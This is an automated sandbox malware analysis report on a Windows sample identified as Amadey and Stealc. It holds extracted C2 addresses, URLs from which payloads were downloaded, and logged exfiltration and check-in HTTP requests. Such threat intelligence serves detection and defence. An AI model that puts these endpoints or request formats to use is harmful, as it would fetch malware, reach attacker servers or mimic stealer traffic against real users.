Windows Analysis Report
4qIl08vrFY.exe

Overview

General Information

Sample name: 4qIl08vrFY.exe
renamed because original name is a hash value
Original sample name: 7a1cee6327c5acf66e2aebb0d7bc25bc.exe
Analysis ID: 1522507
MD5: 7a1cee6327c5acf66e2aebb0d7bc25bc
SHA1: 21fd9f492b550168249793c5b93a0be586e96791
SHA256: 83f5e08f80cb28ba3197e06721b05fc1a1018cb7ea908f054aea6a69014e1a13
Tags: Amadeyexeuser-abuse_ch
Infos:

Detection

Amadey, Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has a writeable .text section
Searches for specific processes (likely to inject)
Sigma detected: Suspicious Script Execution From Temp Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Deletes files inside the Windows folder
Detected non-DNS traffic on DNS port
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Name Description Attribution Blogpost URLs Link
Amadey Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

AV Detection
barindex
Antivirus detection for URL or domain
Source: http://185.215.113.37/ URL Reputation: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\1000115002\6b11689b40.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Found malware configuration
Source: 4qIl08vrFY.exe Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 4.0.num.exe.50000.0.unpack Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Multi AV Scanner detection for domain / URL
Source: http://185.215.113.37/V Virustotal: Detection: 16% Perma Link
Source: http://185.215.113.103/test/num.exe Virustotal: Detection: 20% Perma Link
Source: http://185.215.113.43/Zu7JuNko/index.phpnu Virustotal: Detection: 12% Perma Link
Source: http://185.215.113.37/F Virustotal: Detection: 16% Perma Link
Source: http://185.215.113.37/e2b1563c6670f193.phpu Virustotal: Detection: 16% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\1000115002\6b11689b40.exe ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\num[1].exe ReversingLabs: Detection: 82%
Source: C:\Users\user\AppData\Local\Temp\1000113001\num.exe ReversingLabs: Detection: 82%
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe ReversingLabs: Detection: 68%
Multi AV Scanner detection for submitted file
Source: 4qIl08vrFY.exe Virustotal: Detection: 63% Perma Link
Source: 4qIl08vrFY.exe ReversingLabs: Detection: 68%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000113001\num.exe Joe Sandbox ML: detected
Source: C:\Users\user\1000115002\6b11689b40.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\num[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: 4qIl08vrFY.exe Joe Sandbox ML: detected
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\AppData\Local\Temp\1000113001\num.exe Code function: 4_2_0005C820 memset,lstrlenA,CryptStringToBinaryA,memcpy,lstrcatA,lstrcatA,lstrcatA, 4_2_0005C820
Source: C:\Users\user\AppData\Local\Temp\1000113001\num.exe Code function: 4_2_00057240 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree, 4_2_00057240
Source: C:\Users\user\AppData\Local\Temp\1000113001\num.exe Code function: 4_2_00068EA0 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA, 4_2_00068EA0
Source: C:\Users\user\AppData\Local\Temp\1000113001\num.exe Code function: 4_2_00059AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree, 4_2_00059AC0
Source: C:\Users\user\AppData\Local\Temp\1000113001\num.exe Code function: 4_2_00059B60 CryptUnprotectData,LocalAlloc,memcpy,LocalFree, 4_2_00059B60
Uses 32bit PE files
Source: 4qIl08vrFY.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.5:49786 version: TLS 1.2
Source: 4qIl08vrFY.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\4qIl08vrFY.exe Code function: 0_2_006DDC0D FindFirstFileExW, 0_2_006DDC0D
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 1_2_0017DC0D FindFirstFileExW, 1_2_0017DC0D
Source: C:\Users\user\AppData\Local\Temp\1000113001\num.exe Code function: 4_2_0005E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 4_2_0005E430
Source: C:\Users\user\AppData\Local\Temp\1000113001\num.exe Code function: 4_2_000638B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 4_2_000638B0
Source: C:\Users\user\AppData\Local\Temp\1000113001\num.exe Code function: 4_2_00064910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 4_2_00064910
Source: C:\Users\user\AppData\Local\Temp\1000113001\num.exe Code function: 4_2_0005ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 4_2_0005ED20
Source: C:\Users\user\AppData\Local\Temp\1000113001\num.exe Code function: 4_2_00064570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA, 4_2_00064570
Source: C:\Users\user\AppData\Local\Temp\1000113001\num.exe Code function: 4_2_0005DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 4_2_0005DE10
Source: C:\Users\user\AppData\Local\Temp\1000113001\num.exe Code function: 4_2_0005BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 4_2_0005BE70
Source: C:\Users\user\AppData\Local\Temp\1000113001\num.exe Code function: 4_2_0005DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 4_2_0005DA80
Source: C:\Users\user\AppData\Local\Temp\1000113001\num.exe Code function: 4_2_00063EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose, 4_2_00063EA0
Source: C:\Users\user\AppData\Local\Temp\1000113001\num.exe Code function: 4_2_0005F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 4_2_0005F6B0
Source: C:\Users\user\AppData\Local\Temp\1000113001\num.exe Code function: 4_2_000516D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 4_2_000516D0

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.5:49704 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.5:49705
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49707 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49710 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49713 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49711 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49719 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2856121 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M2 : 192.168.2.5:49708 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49742 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49770 -> 185.215.113.37:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: Malware configuration extractor IPs: 185.215.113.43
Detected non-DNS traffic on DNS port
Source: global traffic TCP traffic: 192.168.2.5:54560 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.5:50756 -> 1.1.1.1:53
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 30 Sep 2024 07:51:08 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Sun, 29 Sep 2024 08:19:54 GMTETag: "4cc00-6233dc0bf3e80"Accept-Ranges: bytesContent-Length: 314368Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bd cf 9d 43 f9 ae f3 10 f9 ae f3 10 f9 ae f3 10 96 d8 58 10 e1 ae f3 10 96 d8 6d 10 f4 ae f3 10 96 d8 59 10 c0 ae f3 10 f0 d6 70 10 fa ae f3 10 79 d7 f2 11 fb ae f3 10 f0 d6 60 10 fe ae f3 10 f9 ae f2 10 97 ae f3 10 96 d8 5c 10 eb ae f3 10 96 d8 6e 10 f8 ae f3 10 52 69 63 68 f9 ae f3 10 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 4a 9a f9 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ce 01 00 00 1a 24 00 00 00 00 00 f0 69 01 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 10 26 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 28 aa 02 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 25 00 e0 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 01 00 04 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8f cc 01 00 00 10 00 00 00 ce 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 e0 2e 72 64 61 74 61 00 00 8c cf 00 00 00 e0 01 00 00 d0 00 00 00 d2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 a4 03 23 00 00 b0 02 00 00 e4 01 00 00 a2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 9e 45 00 00 00 c0 25 00 00 46 00 00 00 86 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 30 Sep 2024 07:51:12 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 30 Sep 2024 07:04:42 GMTETag: "1c5600-62350d1b06f29"Accept-Ranges: bytesContent-Length: 1857024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bd cf 9d 43 f9 ae f3 10 f9 ae f3 10 f9 ae f3 10 96 d8 58 10 e1 ae f3 10 96 d8 6d 10 f4 ae f3 10 96 d8 59 10 c0 ae f3 10 f0 d6 70 10 fa ae f3 10 79 d7 f2 11 fb ae f3 10 f0 d6 60 10 fe ae f3 10 f9 ae f2 10 97 ae f3 10 96 d8 5c 10 eb ae f3 10 96 d8 6e 10 f8 ae f3 10 52 69 63 68 f9 ae f3 10 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4a 9a f9 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ce 01 00 00 1a 24 00 00 00 00 00 00 40 6a 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 70 6a 00 00 04 00 00 63 20 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 d0 25 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 d1 25 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 b0 25 00 00 10 00 00 00 28 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 c0 25 00 00 00 00 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 d0 25 00 00 02 00 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 50 2a 00 00 e0 25 00 00 02 00 00 00 3a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 69 70 61 76 76 69 67 73 00 00 1a 00 00 30 50 00 00 f4 19 00 00 3c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 7a 78 75 64 61 77 6c 6a 00 10 00 00 00 30 6a 00 00 04 00 00 00 30 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 40 6a 00 00 22 00 00 00 34 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 31 32 46 37 30 42 39 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 38 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B12F70B95D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E8
Source: global traffic HTTP traffic detected: GET /test/num.exe HTTP/1.1Host: 185.215.113.103
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHJJDGHCBGDHIECBGIDAHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 4a 4a 44 47 48 43 42 47 44 48 49 45 43 42 47 49 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 30 33 35 38 30 32 39 32 37 37 32 32 35 38 33 35 38 30 30 35 38 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4a 44 47 48 43 42 47 44 48 49 45 43 42 47 49 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 4a 44 47 48 43 42 47 44 48 49 45 43 42 47 49 44 41 2d 2d 0d 0a Data Ascii: ------GHJJDGHCBGDHIECBGIDAContent-Disposition: form-data; name="hwid"5035802927722583580058------GHJJDGHCBGDHIECBGIDAContent-Disposition: form-data; name="build"doma------GHJJDGHCBGDHIECBGIDA--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 65 31 3d 31 30 30 30 31 31 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e1=1000113001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.103
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 31 31 35 30 30 32 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000115002&unit=246122658369
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKJDAEBFCBKECBGDBFCFHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 4a 44 41 45 42 46 43 42 4b 45 43 42 47 44 42 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 30 33 35 38 30 32 39 32 37 37 32 32 35 38 33 35 38 30 30 35 38 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4a 44 41 45 42 46 43 42 4b 45 43 42 47 44 42 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4a 44 41 45 42 46 43 42 4b 45 43 42 47 44 42 46 43 46 2d 2d 0d 0a Data Ascii: ------JKJDAEBFCBKECBGDBFCFContent-Disposition: form-data; name="hwid"5035802927722583580058------JKJDAEBFCBKECBGDBFCFContent-Disposition: form-data; name="build"doma------JKJDAEBFCBKECBGDBFCF--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 31 31 37 30 33 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000117031&unit=246122658369
Source: global traffic HTTP traffic detected: GET /test/ko.ps1 HTTP/1.1Host: 185.215.113.103
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 31 34 30 30 34 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000140041&unit=246122658369
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 31 32 46 37 30 42 39 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 38 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B12F70B95D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E8
